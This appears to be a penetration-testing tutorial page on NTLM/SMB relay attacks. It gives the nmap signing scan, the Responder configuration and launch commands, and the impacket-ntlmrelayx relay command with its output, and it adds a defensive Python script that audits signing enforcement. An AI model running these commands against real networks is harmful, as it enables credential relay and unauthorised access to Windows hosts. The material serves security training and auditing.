# SMB Relay

## Prerequisites

### SMB Signing

By default, SMB signing is enabled but not required (enforcement is disabled) on Windows workstations, and enabled and required on Windows Servers.

### Nmap - SMB Security Mode Discovery

There are two nmap scripts for detecting the SMB message signing mode, one for SMBv1 and one for SMBv2. We are going to use the SMBv2 script.

[nmap --script smb2-security-mode](https://nmap.org/nsedoc/scripts/smb2-security-mode.html)

```bash
nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
```

Copy all targets (IPs/hostnames) into targets.txt.
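The same scan output doubles as a signing audit. The following added example (not part of the original page) parses it and classifies each host, so hosts that still need signing enforced can be tracked. The sample output and hostnames are constructed, and a host with no script result is reported as unknown rather than assumed safe.

```python
import re

# Constructed, abridged sample of nmap smb2-security-mode output
# (documentation addresses and hypothetical hostnames, not real scan data).
SAMPLE = """\
Nmap scan report for ws01.lab.example (192.0.2.10)
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for dc01.lab.example (192.0.2.20)
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.0.2.30
445/tcp closed microsoft-ds
"""

REPORT = re.compile(r"^Nmap scan report for (.+)$")
SIGNING = re.compile(r"Message signing (.+)$")

def classify(status):
    """Map the script's status text to enforced / not-enforced / unknown."""
    if status is None:
        return "unknown"          # no script result: do not assume it is safe
    text = status.lower()
    if "not required" in text or "disabled" in text:
        return "not-enforced"
    return "enforced" if "required" in text else "unknown"

def audit(nmap_output):
    """Return {host: classification} for every host in the scan output."""
    status, host = {}, None
    for line in nmap_output.splitlines():
        if m := REPORT.match(line):
            host = m.group(1).strip()
            status[host] = None   # filled in only if a signing line follows
        elif host and (m := SIGNING.search(line)):
            status[host] = m.group(1).strip()
    return {h: classify(s) for h, s in status.items()}

if __name__ == "__main__":
    for host, result in sorted(audit(SAMPLE).items()):
        print(f"{result:13} {host}")
```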

### Admin Account

The user must be an admin on the relayed machine (you can't do SMB relay without an admin account).

## Responder

### Modify Responder.conf

```bash
# locate Responder.conf
/usr/share/responder/Responder.conf
```

Disable these options:

* SMB = Off
* HTTP = Off

### Start Responder

```bash
responder -I eth0 -rdw -v
```

## NTLM RelayX

The relay server starts its own SMB and HTTP servers (that's why they are disabled in Responder).

```bash
#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
```

## User Interaction

Now a user needs to access an SMB folder.

